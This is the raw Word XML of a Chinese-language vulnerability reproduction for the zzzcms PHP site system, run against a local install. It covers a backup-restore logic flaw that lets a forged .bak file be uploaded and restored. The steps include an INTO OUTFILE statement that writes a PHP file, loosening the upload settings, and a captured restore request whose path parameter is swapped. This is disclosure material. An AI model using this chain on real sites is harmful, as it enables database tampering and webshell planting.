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Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia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</w:rPr>
        <w:t>zzzcms系统是一款免费、开源的php语言建站系统，采用类MVC结构，框架简单，简单易学。诞生于2016年，其设计初衷是为了让用户快速、方便地建立自己的网站。该系统采用PHP语言开发，支持多相对于其他内容管理系统，ZZZCMS的特点在于其操作简单，易于上手，而且具有良好的扩展性和安全性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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Georgia" w:hAnsi="Georgia" w:eastAsia="宋体" w:cs="Georgia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="444443"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Z</w:t>
      </w:r>
      <w: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  <w:t>zzcms存在逻辑缺陷，恢复数据库备份文件处备份文件路径可控，且可以上传自己伪造的数据库备份文件，导致攻击者可以利用这个漏洞篡改服务器数据库中的任意数据，甚至写入木马进行getshell。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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</w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="宋体" w:cs="Georgia"/>
          <w:i w:val="0"/>
          <w:iCs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Georgia" w:hAnsi="Georgia" w:eastAsia="宋体" w:cs="Georgia"/>
          <w:i w:val="0"/>
          <w:iCs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漏洞复现过程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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  <w:t>该cms可以使用sqlite数据库及mysql数据库，这里以比较广泛使用的mysql数据库为例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="宋体" w:cs="Georgia"/>
          <w:i w:val="0"/>
          <w:iCs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Georgia" w:hAnsi="Georgia" w:eastAsia="宋体" w:cs="Georgia"/>
          <w:i w:val="0"/>
          <w:iCs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1.安装过程使用mysql数据库，后台地址使用admin/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1744980</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1819275</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3149600" cy="2197100"/>
                <wp:effectExtent l="6350" t="6350" r="6350" b="63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87980" y="4912995"/>
                          <a:ext cx="3149600" cy="219710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7.4pt;margin-top:143.25pt;height:173pt;width:248pt;z-index:251667456;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJAhKOZ/9gAAAAL&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PP0/DMBDFdyS+g3VIbNROoEkV4nRAdGIASiVWNzZJVPts&#10;2U4bvj3HBNv9effe79rt4iw7m5gmjxKKlQBmsPd6wkHC4WN3twGWskKtrEcj4dsk2HbXV61qtL/g&#10;uznv88DIBFOjJIw5h4bz1I/GqbTywSDtvnx0KlMbB66jupC5s7wUouJOTUgJowrmaTT9aT87wgj2&#10;Lej59XT4LJZdfNYvSQ21lLc3hXgEls2S/8Twi0830BHT0c+oE7MSyvqB0DMVm2oNjBR1LWhylFDd&#10;l2vgXcv//9D9AFBLAwQUAAAACACHTuJAFlVqa3cCAADaBAAADgAAAGRycy9lMm9Eb2MueG1srVTL&#10;bhMxFN0j8Q+W93QyQ9pkok6qqFEQUgWVCmLteDwZS35hO5mUn0Fix0fwOYjf4Hhm+qCw6IIsHF/f&#10;63N9jo/n/OKoFTkIH6Q1Fc1PJpQIw20tza6iHz9sXs0pCZGZmilrREVvRaAXy5cvzju3EIVtraqF&#10;JwAxYdG5irYxukWWBd4KzcKJdcIg2VivWUTod1ntWQd0rbJiMjnLOutr5y0XIWB1PSTpiOifA2ib&#10;RnKxtnyvhYkDqheKRVAKrXSBLvvTNo3g8X3TBBGJqiiYxn5EE8y3acyW52yx88y1ko9HYM85whNO&#10;mkmDpvdQaxYZ2Xv5F5SW3Ntgm3jCrc4GIr0iYJFPnmhz0zInei6QOrh70cP/g+XvDteeyBpOyCkx&#10;TOPGf339/vPHN4IFqNO5sEDRjbv2YxQwTVSPjdfpHyTIsaLFfD4r59D1tqLTMi/K8nRQVxwj4Sh4&#10;nU/LswkKOCqKvJzlCICZPUA5H+IbYTVJk4p6XF+vKjtchTiU3pWkzsZupFJYZwtlSAcOxaxvwODL&#10;Bn5AL+3ALZgdJUztYHgefQ8ZrJJ12p52B7/bXipPDgw22Wwm+I0n+6Ms9V6z0A51fWqgqGXEm1BS&#10;V3SeNt/tVgb0koKDZmm2tfUtFPd2sGJwfCMBe8VCvGYe3oNAeJ3xPYZGWZCy44yS1vov/1pP9bAE&#10;spR08DIIf94zLyhRbw3MUubTKWBjH0xPZwUC/zizfZwxe31poQP8gNP101Qf1d208VZ/wiNepa5I&#10;McPRe5B2DC7j8MbwGeBiterLYHjH4pW5cTyBDxe42kfbyP5uH9QZRYPle3eMzzO9qcdxX/XwSVr+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ISjmf/YAAAACwEAAA8AAAAAAAAAAQAgAAAAIgAAAGRy&#10;cy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kAWVWprdwIAANoEAAAOAAAAAAAAAAEAIAAAACcB&#10;AABkcnMvZTJvRG9jLnhtbFBLBQYAAAAABgAGAFkBAAAQ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7647305" cy="4274820"/>
            <wp:effectExtent l="0" t="0" r="1079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47305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Georgia" w:hAnsi="Georgia" w:eastAsia="宋体" w:cs="Georgia"/>
          <w:i w:val="0"/>
          <w:iCs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/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2.安装完成后，在数据库备份页面http://localhost:8089/admin/?act=datebackuplist点击备份数据库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1124585</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="565150" cy="425450"/>
                <wp:effectExtent l="0" t="0" r="6350" b="635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1897380" y="8973185"/>
                          <a:ext cx="565150" cy="425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59.4pt;margin-top:88.55pt;height:33.5pt;width:44.5pt;z-index:251668480;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJA7BJMX9cAAAAL&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PwU7DMBBE70j8g7VI3KjtUJo2xOkBCSniRtMPcBM7iRqv&#10;I9tN279nOcFtZnc0+7bc39zEFhPi6FGBXAlgBlvfjdgrODafL1tgMWns9OTRKLibCPvq8aHUReev&#10;+G2WQ+oZlWAstIIhpbngPLaDcTqu/GyQdtYHpxPZ0PMu6CuVu4lnQmy40yPShUHP5mMw7flwcQp2&#10;s8Wsaezrcj7aN/t1r3ehrpV6fpLiHVgyt/QXhl98QoeKmE7+gl1kE3m5JfREIs8lMEpkIqfJicR6&#10;LYFXJf//Q/UDUEsDBBQAAAAIAIdO4kAoVRRoIAIAAAUEAAAOAAAAZHJzL2Uyb0RvYy54bWytU82O&#10;0zAQviPxDpbvNGl3u1uqpntoKRwQVOLn7jpOYsl/mvE27UvwAkicgBNw2jtPA8tjME7CAstlD+QQ&#10;zXg838z3zXhxcbCG7RWg9q7g41HOmXLSl9rVBX/1cvNgxhlG4UphvFMFPyrkF8v79xZtmKuJb7wp&#10;FTACcThvQ8GbGMM8y1A2ygoc+aAcBSsPVkRyoc5KEC2hW5NN8vwsaz2UAbxUiHS67oN8QIS7APqq&#10;0lKtvby0ysUeFZQRkShhowPyZddtVSkZn1cVqshMwYlp7P5UhOxd+mfLhZjXIEKj5dCCuEsLtzhZ&#10;oR0VvYFaiyjYJeh/oKyW4NFXcSS9zXoinSLEYpzf0uZFI4LquJDUGG5Ex/8HK5/tt8B0SZtwwpkT&#10;liZ+/fbq+5sP118+f3t/9ePru2R/+sgoTmK1AeeUs3JbGDwMW0jMDxVYVhkdnhAW76zXyUox4skO&#10;5Mwenp/MSPpjwZM5nk37AahDZJIuTM+m4ynFJV04nUxPyaYqWQ+egAJgfKy8ZckoOEYQum7iyjtH&#10;o/bQlxP7pxj7xF8JKdn5jTaGzsXcONZSP5PzPFUTtMYVrQ+ZNpAU6GrOhKnpfcgIHQP0RpcpPWUj&#10;1LuVAbYXtFWbTU7f0Odf11LttcCmv9eFerpWR3pCRluSISUPaxiFNo9cyeIx0BQEgG8HWONIhSR9&#10;L3aydr48djPozmk7Op2GTU7r96ffZf9+vcu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7BJMX9cA&#10;AAALAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQChV&#10;FGggAgAABQQAAA4AAAAAAAAAAQAgAAAAJgEAAGRycy9lMm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEA&#10;ALgFAAAAAA=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6973570" cy="1863725"/>
            <wp:effectExtent l="0" t="0" r="11430" b="31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7357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3.备份完成后，发现备份文件的路径</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="7380605" cy="2073910"/>
            <wp:effectExtent l="0" t="0" r="10795" b="889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  <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>直接使用路径访问备份文件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view-source:http://localhost:8089/admin/backup/1694772751.bak</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现建表sql语句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837055"/>
            <wp:effectExtent l="0" t="0" r="3810" b="444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eastAsia="宋体" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FF9900"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>复制这些建表语句重新创建hacker.bak,并在hacker.bak文件中写入创建php文件的语句select "&lt;?php phpinfo();?&gt;" into outfile "D:/phpstudy_pro/WWW/zzzphp (2)/admin/hack.php";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FF990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-102235</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2668270</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4044950" cy="527050"/>
                <wp:effectExtent l="6350" t="6350" r="12700" b="127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40765" y="3582670"/>
                          <a:ext cx="4044950" cy="52705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.05pt;margin-top:210.1pt;height:41.5pt;width:318.5pt;z-index:251672576;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJABUlGZdgAAAAL&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2Py07DMBBF90j8gzVI7Fo/gNCGOF0gumIBlEps3XhIovol&#10;22nD32NWdDmac++caTazNeSEMY3eSeBLBgRd5/Xoegn7z+1iBSRl5bQy3qGEH0ywaa+vGlVrf3Yf&#10;eNrlnpQSl2olYcg51JSmbkCr0tIHdGX37aNVuYyxpzqqcym3hgrGKmrV6MqFQQV8HrA77iZbNIJ5&#10;D3p6O+6/+LyNL/o1qf5Rytsbzp6AZJzzPwx/+iUDbXE6+MnpRIyEBa94QSXcCyaAFKISbA3kIOGB&#10;3QmgbUMvf2h/AVBLAwQUAAAACACHTuJAIB1zBHcCAADZBAAADgAAAGRycy9lMm9Eb2MueG1srVRL&#10;btswEN0X6B0I7hvJrhwnQuTAiOGiQNAESIuuaYqyCPBXkracXqZAdz1EjlP0Gn2UlE/TLrKoF/IM&#10;Z/iG8/iGZ+cHrche+CCtqejkKKdEGG5rabYV/fRx/eaEkhCZqZmyRlT0VgR6vnj96qxzpZja1qpa&#10;eAIQE8rOVbSN0ZVZFngrNAtH1gmDYGO9ZhGu32a1Zx3QtcqmeX6cddbXzlsuQsDqagjSEdG/BNA2&#10;jeRiZflOCxMHVC8Ui2gptNIFuuhP2zSCx6umCSISVVF0GvsvisDepG+2OGPl1jPXSj4egb3kCM96&#10;0kwaFH2AWrHIyM7Lv6C05N4G28QjbnU2NNIzgi4m+TNublrmRN8LqA7ugfTw/2D5h/21J7KGEuaU&#10;GKZx47++/fh5951gAex0LpRIunHXfvQCzNTqofE6/aMJcsD+vMjnxzNKbiv6dnYyPZ6P7IpDJBwJ&#10;RV4UpzMQz5Exm85z2IDMHpGcD/GdsJoko6Iet9eTyvaXIQ6p9ympsLFrqRTWWakM6XAEgCZ8Blk2&#10;kANM7dBaMFtKmNpC7zz6HjJYJeu0Pe0Ofru5UJ7sGVSyXuf4jSf7Iy3VXrHQDnl9KKWxUsuIkVBS&#10;V/Qkbb7frQzaSwQOlCVrY+tbEO7toMTg+FoC9pKFeM08pIfzYzjjFT6NsmjKjhYlrfVf/7We8qEI&#10;RCnpIGU0/GXHvKBEvTfQyumkKAAbe6eYzadw/NPI5mnE7PSFBQ8TPAOO92bKj+rebLzVnzHDy1QV&#10;IWY4ag/Ujs5FHEYMrwAXy2WfBr07Fi/NjeMJfLjA5S7aRvZ3+8jOSBoU36tjnM40Uk/9PuvxRVr8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AVJRmXYAAAACwEAAA8AAAAAAAAAAQAgAAAAIgAAAGRy&#10;cy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kAgHXMEdwIAANkEAAAOAAAAAAAAAAEAIAAAACcB&#10;AABkcnMvZTJvRG9jLnhtbFBLBQYAAAAABgAGAFkBAAAQ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070350" cy="3308350"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>然后，在上传设置处localhost:8089/admin/?act=uploadset 进行文件上传限制的更改，增加允许的后缀名bak，保证hacker.bak可以上传到服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="3537585"/>
            <wp:effectExtent l="0" t="0" r="5715" b="571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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>保存上传设置之后，在栏目编辑处localhost:8089/admin/?act=sortlist  点击编辑按钮来编辑栏目以上传hacker.bak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4743450</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>823595</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="106680" cy="266065"/>
                <wp:effectExtent l="5715" t="2540" r="14605" b="10795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945505" y="5819775"/>
                          <a:ext cx="106680" cy="2660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73.5pt;margin-top:64.85pt;height:20.95pt;width:8.4pt;z-index:251669504;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJA5dwzg9cAAAAL&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PwU7DMBBE70j8g7VI3KidgmIIcXooghsCWuDsxk4c1V5H&#10;sdOWv2c50ePOjGbn1atT8OxgpzREVFAsBDCLbTQD9go+t88398BS1mi0j2gV/NgEq+byotaViUf8&#10;sIdN7hmVYKq0ApfzWHGeWmeDTos4WiSvi1PQmc6p52bSRyoPni+FKHnQA9IHp0e7drbdb+ag4Olr&#10;L97d68v4bQb/Nqe5w/W2U+r6qhCPwLI95f8w/M2n6dDQpl2c0STmFcg7SSyZjOWDBEYJWd4SzI4U&#10;WZTAm5qfMzS/UEsDBBQAAAAIAIdO4kC2dFMAGQIAAPEDAAAOAAAAZHJzL2Uyb0RvYy54bWytU82O&#10;0zAQviPxDpbvNGm1TbtV0z20lAuCSsADuI6TWPKfxt6mfQleAIkTcAJOe+dpYPcxduyEXVgueyAH&#10;Z+yZ+Wa+z+PlxVErchDgpTUlHY9ySoThtpKmKem7t9tnc0p8YKZiyhpR0pPw9GL19Mmycwsxsa1V&#10;lQCCIMYvOlfSNgS3yDLPW6GZH1knDDprC5oF3EKTVcA6RNcqm+R5kXUWKgeWC+/xdNM76YAIjwG0&#10;dS252Fh+qYUJPSoIxQJS8q10nq5St3UteHhd114EokqKTENasQja+7hmqyVbNMBcK/nQAntMCw84&#10;aSYNFr2D2rDAyCXIf6C05GC9rcOIW531RJIiyGKcP9DmTcucSFxQau/uRPf/D5a/OuyAyKqkkzNK&#10;DNN449cfrn69/3z9/dvPT1c3Pz5G++sXgn4Uq3N+gTlrs4Nh590OIvNjDTr+kRM5lnR6fjad5lNK&#10;TmjPx+ez2bQXWxwD4RgwzotijtfAMWBSFHmR/Nk9kAMfXgirSTRK6gMw2bRhbY3Ba7UwToKzw0sf&#10;sBVM/J0QuzB2K5VKt6sM6bDcZJbHagxHtsZRQVM7pO1NQwlTDb4FHiBBeqtkFdMjkIdmv1ZADgwn&#10;aLvN8Ys8sNxfYbH2hvm2j0uunq6WAZ+Lkrqk85g8jFxgUj03FQknh4ozANsNsMogepS5FzZae1ud&#10;kt7pHCch1R+mNo7an/uUff9SV7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l3DOD1wAAAAsBAAAP&#10;AAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAACACHTuJAtnRTABkCAADx&#10;AwAADgAAAAAAAAABACAAAAAmAQAAZHJzL2Uyb0RvYy54bWxQSwUGAAAAAAYABgBZAQAAsQUAAAAA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3675" cy="1506220"/>
            <wp:effectExtent l="0" t="0" r="9525" b="508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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在栏目大图处可以上传hacker.bak，并显示处上传文件后的路径/upload/sort/1694774144356368.bak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337185</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1853565</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4925695" cy="257175"/>
                <wp:effectExtent l="6350" t="6350" r="8255" b="1587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77950" y="2752090"/>
                          <a:ext cx="4925695" cy="25717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.55pt;margin-top:145.95pt;height:20.25pt;width:387.85pt;z-index:251670528;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJACkZL2dgAAAAK&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PPU/DMBCGdyT+g3VIbNRxwkca4nRAdGIASiVWNzZJVPts&#10;2U4b/j3HBOPpnnvvedvN4iw7mZgmjxLEqgBmsPd6wkHC/mN7UwNLWaFW1qOR8G0SbLrLi1Y12p/x&#10;3Zx2eWAUgqlREsacQ8N56kfjVFr5YJB2Xz46lWmMA9dRnSncWV4WxT13akL6MKpgnkbTH3ezI41g&#10;34KeX4/7T7Fs47N+SWp4kPL6ShSPwLJZ8h8Mv/p0Ax05HfyMOjEr4a4SREoo12INjIC6rKnLQUJV&#10;lbfAu5b/r9D9AFBLAwQUAAAACACHTuJAu9VltXkCAADZBAAADgAAAGRycy9lMm9Eb2MueG1srVRL&#10;btswEN0X6B0I7hvJrhXHQuTAiOGiQNAGSIuuaYqyCPBXkracXqZAdz1Ej1P0Gn2UlE/TLrKoF/KQ&#10;M3wz8/iG5xdHrchB+CCtqejkJKdEGG5raXYV/fhh8+qMkhCZqZmyRlT0VgR6sXz54rxzpZja1qpa&#10;eAIQE8rOVbSN0ZVZFngrNAsn1gkDZ2O9ZhFLv8tqzzqga5VN8/w066yvnbdchIDd9eCkI6J/DqBt&#10;GsnF2vK9FiYOqF4oFtFSaKULdNlX2zSCx/dNE0QkqqLoNPZfJIG9Td9sec7KnWeulXwsgT2nhCc9&#10;aSYNkt5DrVlkZO/lX1Bacm+DbeIJtzobGukZQReT/Ak3Ny1zou8FVAd3T3r4f7D83eHaE1lXdHpK&#10;iWEaN/7r6/efP74RbICdzoUSQTfu2o+rADO1emy8Tv9oghyhpNfz+aIAr7fAmhfTfDGyK46RcATM&#10;FtPidFFQwlNEMZ/Mi5Qge0ByPsQ3wmqSjIp63F5PKjtchTiE3oWkxMZupFLYZ6UypEMJ03mOAjiD&#10;LBvIAaZ2aC2YHSVM7aB3Hn0PGaySdTqeTge/214qTw4MKtlscvzGyv4IS7nXLLRDXO9KYazUMmIk&#10;lNQVPUuH704rg/YSgQNlydra+haEezsoMTi+kYC9YiFeMw/poX4MZ3yPT6MsmrKjRUlr/Zd/7ad4&#10;KAJeSjpIGQ1/3jMvKFFvDbSymMxmgI39YlbMp1j4x57tY4/Z60sLHiZ4BhzvzRQf1Z3ZeKs/YYZX&#10;KStczHDkHqgdF5dxGDG8AlysVn0Y9O5YvDI3jifw4QJX+2gb2d/tAzsjaVB8r45xOtNIPV73UQ8v&#10;0vI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CkZL2dgAAAAKAQAADwAAAAAAAAABACAAAAAiAAAA&#10;ZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQLvVZbV5AgAA2QQAAA4AAAAAAAAAAQAgAAAA&#10;JwEAAGRycy9lMm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAABI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1135" cy="3183255"/>
            <wp:effectExtent l="0" t="0" r="12065" b="444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保存编辑。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.然后访问数据库备份页面localhost:8089/admin/?act=datebackuplist，随便选择一个备份文件，点击恢复数据库，抓取数据包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4187825</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>915670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="170180" cy="234315"/>
                <wp:effectExtent l="5080" t="3810" r="2540" b="317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30825" y="5594350"/>
                          <a:ext cx="170180" cy="2343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9.75pt;margin-top:72.1pt;height:18.45pt;width:13.4pt;z-index:251671552;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJAlu5UStgAAAAL&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PwU7DMAyG70i8Q2Qkbizp2Kqua7rDENwQsAHnrEmbaolT&#10;Nek23h5zYkf7//T7c7W5eMdOZox9QAnZTAAz2ATdYyfhc//8UACLSaFWLqCR8GMibOrbm0qVOpzx&#10;w5x2qWNUgrFUEmxKQ8l5bKzxKs7CYJCyNoxeJRrHjutRnancOz4XIude9UgXrBrM1prmuJu8hKev&#10;o3i3ry/Dt+7d2xSnFrf7Vsr7u0ysgSVzSf8w/OmTOtTkdAgT6sichHy5WhJKwWIxB0ZEXuSPwA60&#10;KbIMeF3x6x/qX1BLAwQUAAAACACHTuJA93Iz2hkCAADxAwAADgAAAGRycy9lMm9Eb2MueG1srVPN&#10;ctMwEL4zwztodCd2koamnjg9JIQLA50BHmAjy7Zm9DcrNU5eghdghhNwopx652mgPAYrx7RQLj3g&#10;g7zS7n6736fV4nxvNNtJDMrZko9HOWfSClcp25T87ZvNkzlnIYKtQDsrS36QgZ8vHz9adL6QE9c6&#10;XUlkBGJD0fmStzH6IsuCaKWBMHJeWnLWDg1E2mKTVQgdoRudTfL8adY5rDw6IUOg0/XRyQdEfAig&#10;q2sl5NqJSyNtPKKi1BCJUmiVD3zZd1vXUsRXdR1kZLrkxDT2KxUhe5vWbLmAokHwrRJDC/CQFu5x&#10;MqAsFb2FWkMEdonqHyijBLrg6jgSzmRHIr0ixGKc39PmdQte9lxI6uBvRQ//D1a83F0gU1XJJ2ec&#10;WTB04zfvr3+8+3Tz9er7x+uf3z4k+8tnRn4Sq/OhoJyVvcBhF/wFJub7Gk36Eye2L/lsOs3nkxln&#10;B7JnZyfT2SC23EcmKGB8mo/ndA2CAibTk+l4lvCzOyCPIT6XzrBklDxEBNW0ceWspWt1OO4Fh92L&#10;EI+JvxNSF9ZtlNZ0DoW2rKNyk9M8VQMa2ZpGhUzjiXawDWegG3oLImIPGZxWVUpP2QGb7Uoj2wFN&#10;0GaT0zf0+VdYqr2G0B7jelcKg8KoSM9FK1PyeUoeVIig9DNbsXjwpDggum6A1ZZUSDIfhU3W1lWH&#10;Xu/+nCah12mY2jRqf+777LuXuvw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lu5UStgAAAALAQAA&#10;DwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQPdyM9oZAgAA&#10;8QMAAA4AAAAAAAAAAQAgAAAAJwEAAGRycy9lMm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAALIFAAAA&#10;AA=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7960" cy="2108200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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抓取的数据包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/admin/save.php?act=restore HTTP/1.1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Host: localhost:8089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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0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Accept: */*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Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2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Accept-Encoding: gzip, deflate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Content-Type: application/x-www-form-urlencoded; charset=UTF-8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X-Requested-With: XMLHttpRequest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Content-Length: 39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Origin: http://localhost:8089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Connection: close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Referer: http://localhost:8089/admin/?act=datebackuplist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Cookie: zzz389_adminpass=1; PHPSESSID=jfk2mts7unak1qa31fildvupl7; zzz811_token=d7be3baac1ee456de001dc36f50e795f; zzz863_adminpass=0; zzz863_adminname=admin; zzz863_admintime=1694772452; zzz863_adminface=..%2Fplugins%2Fface%2Fface01.png; zzz811_upload=[{"url":"/upload/sort/1694774144356368.bak","title":"hacker.bak"}]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Sec-Fetch-Dest: empty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Sec-Fetch-Mode: cors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Sec-Fetch-Site: same-origin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path=%2Fadmin%2Fbackup%2F1694772751.bak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sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>11.将path的值改为我们篡改过的备份文件的路径的url编码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
